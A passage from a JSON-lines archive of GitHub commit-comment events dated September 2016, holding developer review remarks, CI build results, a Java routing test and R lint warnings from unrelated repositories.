{"id":"4595046809","type":"CommitCommentEvent","actor":{"login":"soltysh"},"repo":{"name":"PyConPL/Book"},"payload":{"comment":{"id":19110632,"position":55,"line":55,"path":"2016/__context__/src/pycon2016/text.tex","commit_id":"572d2a1ed32fab8edb26578557f98dde409395fd","created_at":"2016-09-21T09:22:19Z","updated_at":"2016-09-21T09:22:19Z","body":"@kwadrat oznacz Radomira jako w-ce i daj go na drugą pozycję."}},"created_at":"2016-09-21T09:22:19Z"}
{"id":"4595047205","type":"CommitCommentEvent","actor":{"login":"s1monw"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110633,"position":24,"line":753,"path":"core/src/main/java/org/elasticsearch/index/shard/IndexShard.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T09:22:24Z","updated_at":"2016-09-21T09:22:24Z","body":"we have to expose it otherwise IndexingMemoryController doesn't handle it if the recovery takes too much memory. I think that is the main issue. I can still look into it later"}},"created_at":"2016-09-21T09:22:24Z"}
{"id":"4595047597","type":"CommitCommentEvent","actor":{"login":"Bysokar"},"repo":{"name":"aidancbrady/DefenseTech"},"payload":{"comment":{"id":19110634,"position":null,"line":null,"path":null,"commit_id":"569c85b53f6440191b24507a28dca8b61fe0df97","created_at":"2016-09-21T09:22:28Z","updated_at":"2016-09-21T09:22:28Z","body":"@aidancbrady Is this included in B46? "}},"created_at":"2016-09-21T09:22:28Z"}
{"id":"4595048962","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110641,"position":12,"line":312,"path":"src/FffGcodeWriter.cpp","commit_id":"228b13c96c59592c176075daae290eb52b7e503c","created_at":"2016-09-21T09:22:45Z","updated_at":"2016-09-21T09:22:45Z","body":"It is indeed unrelated and just something to think about refactoring one day. A factory pattern typically goes like this:\r\n\r\n    Infill infill_comp();\r\n    infill_comp.setInfillMethod(EFillMethod::LINES);\r\n    infill_comp.setBoundary(wall);\r\n    infill_comp.setLineWidth(storage.raft_base_config.getLineWidth());\r\n    ...\r\n    infill_comp.generate();\r\n\r\nIt's basically a roundabout way to get optional key-word parameters in a function. The constructor doesn't do much, but the fields are set by each of these functions. Typically a factory doesn't guarantee that all parameters are set, but uses sensible defaults. You can still check if all or some parameters are set though in the generate function, by setting invalid values as defaults (and having the input checking handle the rest) or by having extra booleans that track if a setting has been set since construction."}},"created_at":"2016-09-21T09:22:45Z"}
{"id":"4595049368","type":"CommitCommentEvent","actor":{"login":"phonecom01"},"repo":{"name":"phonecom01/helloworld"},"payload":{"comment":{"id":19110642,"position":null,"line":null,"path":null,"commit_id":"d6ea3150b33f3061bba2c4ca06e8b39d3505c37b","created_at":"2016-09-21T09:22:50Z","updated_at":"2016-09-21T09:22:50Z","body":"000"}},"created_at":"2016-09-21T09:22:50Z"}
{"id":"4595051144","type":"CommitCommentEvent","actor":{"login":"gellyleo"},"repo":{"name":"getsupertext/soft-mocks"},"payload":{"comment":{"id":19110651,"position":null,"line":null,"path":null,"commit_id":"be1f22bd8d80b9e5c1548a8082c8f38d2d4a7fb4","created_at":"2016-09-21T09:23:12Z","updated_at":"2016-09-21T09:23:12Z","body":"Thanks Yuriy,\r\n\r\nGood advice, and yes I realized that after a bit. At the outset I did not think I could get away with only rewriting require/include, so I thought AST-rewriting was the best way forward. Fortunately I seem to be wrong about that, so I'll update with a refactored implementation at my first opportunity."}},"created_at":"2016-09-21T09:23:12Z"}
{"id":"4595051539","type":"CommitCommentEvent","actor":{"login":"SuZhuo20"},"repo":{"name":"SuZhuo20/git_javascription_jilei"},"payload":{"comment":{"id":19110656,"position":23,"line":23,"path":"absolute.html","commit_id":"74a8a9a4c8297fe69a2b23fb074d4c2bfa34c79d","created_at":"2016-09-21T09:23:16Z","updated_at":"2016-09-21T09:23:16Z","body":"内层父元素"}},"created_at":"2016-09-21T09:23:16Z"}
{"id":"4595052677","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19110658,"position":18,"line":314,"path":"ryu/lib/stplib.py","commit_id":"0fbbfda834cf742a9aa3650a8b3609ee8bc21fc8","created_at":"2016-09-21T09:23:30Z","updated_at":"2016-09-21T09:23:30Z","body":"私がお試しで書いたソース、コミットコメントが\r\nただ全採用されてるだけに読めますが、\r\nRyu-Book にある動作以外にも他のテストは行ってますかん\r\n\r\nports_state を更新する契機は他にもありそうなんですが、、、"}},"created_at":"2016-09-21T09:23:30Z"}
{"id":"4595054165","type":"CommitCommentEvent","actor":{"login":"whchoi83"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19110661,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T09:23:49Z","updated_at":"2016-09-21T09:23:49Z","body":"아... put 으로 이전 값이 return 되는 걸 생각 못했었네요. \r\n단 아래 처럼 compare 를 해야겠네요.\r\n```java\r\nif (config.compareNodeName(colln, node) < 0\r\n```"}},"created_at":"2016-09-21T09:23:49Z"}
{"id":"4595055486","type":"CommitCommentEvent","actor":{"login":"CapacitorSet"},"repo":{"name":"CapacitorSet/box-js"},"payload":{"comment":{"id":19110664,"position":null,"line":null,"path":null,"commit_id":"715e5c8b074a42296c1a4692bfcf0906806fff2c","created_at":"2016-09-21T09:24:05Z","updated_at":"2016-09-21T09:24:05Z","body":"Oh, yeah, nice catch. I fixed this in 8d17f0134511e5baf1607932135e87af894d9942; I'll review the other PR later today."}},"created_at":"2016-09-21T09:24:05Z"}
{"id":"4595055828","type":"CommitCommentEvent","actor":{"login":"Huluti"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19110665,"position":5,"line":0,"path":"init.py","commit_id":"1af5fb42dcaa4da8cb9c6c683409ce8e88b018a4","created_at":"2016-09-21T09:24:09Z","updated_at":"2016-09-21T09:24:09Z","body":"It was an error in one of my commits..."}},"created_at":"2016-09-21T09:24:09Z"}
{"id":"4595056695","type":"CommitCommentEvent","actor":{"login":"sm-ll"},"repo":{"name":"RaisingITDev/codeclips"},"payload":{"comment":{"id":19110668,"position":null,"line":null,"path":null,"commit_id":"caeee4b3192553d0e80af6123c3084b7db6048e1","created_at":"2016-09-21T09:24:19Z","updated_at":"2016-09-21T09:24:19Z","body":"No worries, it's a temp thing, as there was some !important's in the baseframework code and I needed a quick solution. I will be doing a clean up this week for sure."}},"created_at":"2016-09-21T09:24:19Z"}
{"id":"4595058195","type":"CommitCommentEvent","actor":{"login":"bleskes"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110671,"position":24,"line":753,"path":"core/src/main/java/org/elasticsearch/index/shard/IndexShard.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T09:24:37Z","updated_at":"2016-09-21T09:24:37Z","body":"fair enough."}},"created_at":"2016-09-21T09:24:37Z"}
{"id":"4595058424","type":"CommitCommentEvent","actor":{"login":"svenefftinge"},"repo":{"name":"kthoms/xtext-core"},"payload":{"comment":{"id":19110673,"position":18,"line":115,"path":"org.eclipse.xtext.xtext.wizard/src/org/eclipse/xtext/xtext/wizard/RuntimeProjectDescriptor.xtend","commit_id":"9d17bc7443c4c85b3fdd681370cdd8e940392a7e","created_at":"2016-09-21T09:24:40Z","updated_at":"2016-09-21T09:24:40Z","body":"How do we know this project is used within Eclipse?"}},"created_at":"2016-09-21T09:24:40Z"}
{"id":"4595059828","type":"CommitCommentEvent","actor":{"login":"PGWelch"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19110675,"position":null,"line":null,"path":null,"commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-21T09:24:56Z","updated_at":"2016-09-21T09:24:56Z","body":"This is probably too late to be useful but I have a failing test now, pasted below. The test itself isn't great - it only fails because the regret inserter inserts shipment 1 first then shipment 2; it probably wouldn't fail if the regret inserter inserted shipment 2 first and then shipment 1. Really the test should control the insertion order (so insert shipment 1 first, then shipment 2 second).\r\n\r\nThe key point is that the optimal route should cause the second shipment to be inserted with its pickup stop **before** the pickup stop of the first inserted shipment, thereby moving the first inserted pickup forward in time and screwing up the calculation.\r\n\r\n\r\n\tprivate static Pair<VehicleRoutingProblem, VehicleRoutingProblemSolution> runProblem(double maxTimeInVehicle) {\r\n\r\n\t\tShipment s1 = Shipment.Builder.newInstance(\"s1\").setPickupLocation(Location.newInstance(\"P1\"))\r\n\t\t\t\t.setDeliveryLocation(Location.newInstance(\"D1\")).setDeliveryServiceTime(0).setPickupServiceTime(0)\r\n\t\t\t\t.setMaxTimeInVehicle(maxTimeInVehicle).build();\r\n\t\tShipment s2 = Shipment.Builder.newInstance(\"s2\").setPickupLocation(Location.newInstance(\"P2\"))\r\n\t\t\t\t.setDeliveryLocation(Location.newInstance(\"D2\")).setDeliveryServiceTime(0).setPickupServiceTime(0)\r\n\t\t\t\t.setMaxTimeInVehicle(maxTimeInVehicle).build();\r\n\r\n\t\t// create vehicle with unit cost for travel time and zero cost for everything else\r\n\t\tLocation depot = Location.newInstance(\"Depot\");\r\n\t\tVehicleTypeImpl vType = VehicleTypeImpl.Builder.newInstance(\"type\").setCostPerDistance(0).setCostPerTransportTime(1)\r\n\t\t\t\t.setCostPerWaitingTime(0).setCostPerServiceTime(0).setFixedCost(0).build();\r\n\t\tVehicleImpl.Builder vBuilder = VehicleImpl.Builder.newInstance(\"v\").setStartLocation(depot).setEndLocation(depot)\r\n\t\t\t\t.setEarliestStart(0).setType(vType);\r\n\r\n\t\tVehicle v = vBuilder.build();\r\n\r\n\t\tVehicleRoutingTransportCosts costs = new VehicleRoutingTransportCosts() {\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic double getBackwardTransportCost(Location from, Location to, double arrivalTime, Driver driver, Vehicle vehicle) {\r\n\t\t\t\treturn get(from, to);\r\n\t\t\t}\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic double getTransportCost(Location from, Location to, double departureTime, Driver driver, Vehicle vehicle) {\r\n\t\t\t\treturn get(from, to);\r\n\t\t\t}\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic double getBackwardTransportTime(Location from, Location to, double arrivalTime, Driver driver, Vehicle vehicle) {\r\n\t\t\t\treturn get(from, to);\r\n\t\t\t}\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic double getTransportTime(Location from, Location to, double departureTime, Driver driver, Vehicle vehicle) {\r\n\t\t\t\treturn get(from, to);\r\n\t\t\t}\r\n\r\n\t\t\tprivate double get(Location from, Location to) {\r\n\r\n\t\t\t\tString fId = from.getId();\r\n\t\t\t\tString tId = to.getId();\r\n\r\n\t\t\t\t// P1,P2,D1,D2 or P2,P1,D2,D1 should have 5 between each stop.\r\n\t\t\t\t// Otherwise we should have 10 between each stop.\r\n\t\t\t\t\r\n\t\t\t\t// Set zero depot travel.\r\n\t\t\t\tif (fId.equals(\"Depot\") || tId.equals(\"Depot\")) {\r\n\t\t\t\t\treturn 0;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\tString combined = fId + \",\" + tId;\r\n\t\t\t\t//  Have travel of 5 between all stops on our ideal route \"P2, P1, D2, D1\"\r\n\t\t\t\tif(combined.equals(\"P2,P1\") || combined.equals(\"P1,D2\") || combined.equals(\"D2,D1\")){\r\n\t\t\t\t\treturn 5;\r\n\t\t\t\t}\r\n\r\n\r\n\t\t\t\t// All others are 10\r\n\t\t\t\treturn 10;\r\n\t\t\t}\r\n\t\t};\r\n\r\n\t\tVehicleRoutingProblem vrp = VehicleRoutingProblem.Builder.newInstance().addVehicle(v).addJob(s1)\r\n\t\t\t\t.addJob(s2)\r\n\t\t\t\t.setRoutingCost(costs).setFleetSize(FleetSize.FINITE)\r\n\t\t\t\t.build();\r\n\r\n\t\tStateManager stateManager = new StateManager(vrp);\r\n\t\tStateId id = stateManager.createStateId(\"max-time\");\r\n\t\tstateManager.addStateUpdater(new UpdateMaxTimeInVehicle(stateManager, id, vrp.getTransportCosts(), vrp.getActivityCosts()));\r\n\r\n\t\tConstraintManager constraintManager = new ConstraintManager(vrp, stateManager);\r\n\t\tconstraintManager.addConstraint(new MaxTimeInVehicleConstraint(vrp.getTransportCosts(), vrp.getActivityCosts(), id, stateManager),\r\n\t\t\t\tConstraintManager.Priority.CRITICAL);\r\n\r\n\t\tVehicleRoutingAlgorithm vra = Jsprit.Builder.newInstance(vrp).setStateAndConstraintManager(stateManager, constraintManager)\r\n\t\t\t\t.buildAlgorithm();\r\n\t\t\r\n\t\t// do construction only\r\n\t\tvra.setMaxIterations(-1);\r\n\t\tVehicleRoutingProblemSolution solution = Solutions.bestOf(vra.searchSolutions());\r\n\r\n\t\treturn new Pair<VehicleRoutingProblem, VehicleRoutingProblemSolution> (vrp,solution);\r\n\t}\r\n\r\n\tprivate static String locationsIdsToString(VehicleRoutingProblemSolution solution, boolean addTimes) {\r\n\t\tVehicleRoute route = solution.getRoutes().iterator().next();\r\n\r\n\t\tStringBuilder builder = new StringBuilder();\r\n\t\tfor (TourActivity ta : route.getActivities()) {\r\n\t\t\tif (builder.length() > 0) {\r\n\t\t\t\tbuilder.append(\",\");\r\n\t\t\t}\r\n\t\t\tbuilder.append(ta.getLocation().getId());\r\n\t\t\tif (addTimes) {\r\n\t\t\t\tbuilder.append(\"@\");\r\n\t\t\t\tbuilder.append(ta.getArrTime());\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn builder.toString();\r\n\t}\r\n\r\n\t@Test\r\n\tpublic void test() {\r\n\r\n\t\t// run with max time constraint effectively turned off\r\n\t\tPair<VehicleRoutingProblem, VehicleRoutingProblemSolution> pair =  runProblem(99999);\r\n\t\tVehicleRoutingProblemSolution solution =pair.getSecond();\r\n\t\tString locIds = locationsIdsToString(solution, false);\r\n\t\tSystem.out.println(\"First (optimal) route: \"+  locIds);\r\n\r\n\t\tassertEquals(\"Should find optimimal route\", \"P2,P1,D2,D1\",locIds);\r\n\t\tassertEquals(\"Should find optimimal route\",15, solution.getCost(), 0.00001);\r\n\t\t\r\n\t\t// Check timings for optimal route\r\n\t\tList<TourActivity> activities= solution.getRoutes().iterator().next().getActivities();\r\n\t\tassertEquals(0, activities.get(0).getArrTime(),0.001);\r\n\t\tassertEquals(5, activities.get(1).getArrTime(),0.001);\r\n\t\tassertEquals(10, activities.get(2).getArrTime(),0.001);\r\n\t\tassertEquals(15, activities.get(3).getArrTime(),0.001);\r\n\t\tTreeMap<String, Double> locsToTimes = new TreeMap<>();\r\n\t\tfor(TourActivity ta:activities){\r\n\t\t\tlocsToTimes.put(ta.getLocation().getId(), ta.getArrTime());\r\n\t\t}\r\n\r\n\t\t// optimal route has max time in vehicle less than 11\r\n\t\tassertTrue(locsToTimes.get(\"D1\")- locsToTimes.get(\"P1\")<10.99);\r\n\t\tassertTrue(locsToTimes.get(\"D2\")- locsToTimes.get(\"P2\")<10.99);\r\n\r\n\t\t// run with max time in vehicle = 11\r\n\t\tPair<VehicleRoutingProblem, VehicleRoutingProblemSolution> pair2 =  runProblem(11);\r\n\t\tSystem.out.println(\"Second route:\" + locationsIdsToString(pair2.getSecond(), false));\r\n\t\tassertEquals(\"Should still find optimimal route\",15, pair2.getSecond().getCost(), 0.00001);\r\n\r\n\t}"}},"created_at":"2016-09-21T09:24:56Z"}
{"id":"4595059838","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19110676,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T09:24:56Z","updated_at":"2016-09-21T09:24:56Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-21T09:24:56Z"}
{"id":"4595061607","type":"CommitCommentEvent","actor":{"login":"rafuck"},"repo":{"name":"rafuck/DbSimple"},"payload":{"comment":{"id":19110680,"position":null,"line":null,"path":null,"commit_id":"7716cca9ab8aa92a354fc4ef7141d2d4886b1441","created_at":"2016-09-21T09:25:17Z","updated_at":"2016-09-21T09:25:17Z","body":"```\r\n$DB->select(\r\n\t'SELECT * FROM `test` WHERE (?&) ORDER BY ?o', \r\n\tarray('name%' => 'b%', 'id>' => 0, 'id<=' => 5, 'a' => 4),\r\n\t'name'\r\n);\r\n```\r\n//------------------------------------------\r\n```\r\nSELECT * FROM `test` WHERE (`name` LIKE 'b%') AND (`id` > 0) AND (`id` <= 5) AND (`a` = 4)\r\n```"}},"created_at":"2016-09-21T09:25:17Z"}
{"id":"4595063773","type":"CommitCommentEvent","actor":{"login":"sm-ll"},"repo":{"name":"RaisingITDev/codeclips"},"payload":{"comment":{"id":19110685,"position":null,"line":null,"path":null,"commit_id":"7c714a889fd551581d3318207ef29ff14c4b4b60","created_at":"2016-09-21T09:25:42Z","updated_at":"2016-09-21T09:25:42Z","body":"Ha, I was just thinking the same thing and then saw your email, sorry totally forgot. :)"}},"created_at":"2016-09-21T09:25:42Z"}
{"id":"4595067243","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19110692,"position":null,"line":null,"path":null,"commit_id":"69affeb17a69b05df08437f1c3ced982c7eac0f7","created_at":"2016-09-21T09:26:23Z","updated_at":"2016-09-21T09:26:23Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2203 of 2479 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.87%25-red.svg)</a> \n"}},"created_at":"2016-09-21T09:26:23Z"}
{"id":"4595070195","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19110701,"position":null,"line":null,"path":null,"commit_id":"a2b70865948a7c1bc5e1a2a69797aa865c96d45e","created_at":"2016-09-21T09:26:57Z","updated_at":"2016-09-21T09:26:57Z","body":"This won't work, is by cpu, not by cluster\r\nhttps://gitlab.com/engstk/thulium/commit/9b8802b2d187ee272f82583d8712384893ac343c"}},"created_at":"2016-09-21T09:26:57Z"}
{"id":"4595072366","type":"CommitCommentEvent","actor":{"login":"zhiqiang1111"},"repo":{"name":"zhiqiang1111/first"},"payload":{"comment":{"id":19110708,"position":null,"line":null,"path":null,"commit_id":"084e0d2ba6cc450e9170964ebbd3365995759195","created_at":"2016-09-21T09:27:23Z","updated_at":"2016-09-21T09:27:23Z","body":"成立\r\n"}},"created_at":"2016-09-21T09:27:23Z"}
{"id":"4595077834","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19110720,"position":null,"line":null,"path":null,"commit_id":"4e30b1371bfbaf11e4294525fdcd2182a7f34038","created_at":"2016-09-21T09:28:29Z","updated_at":"2016-09-21T09:28:29Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); 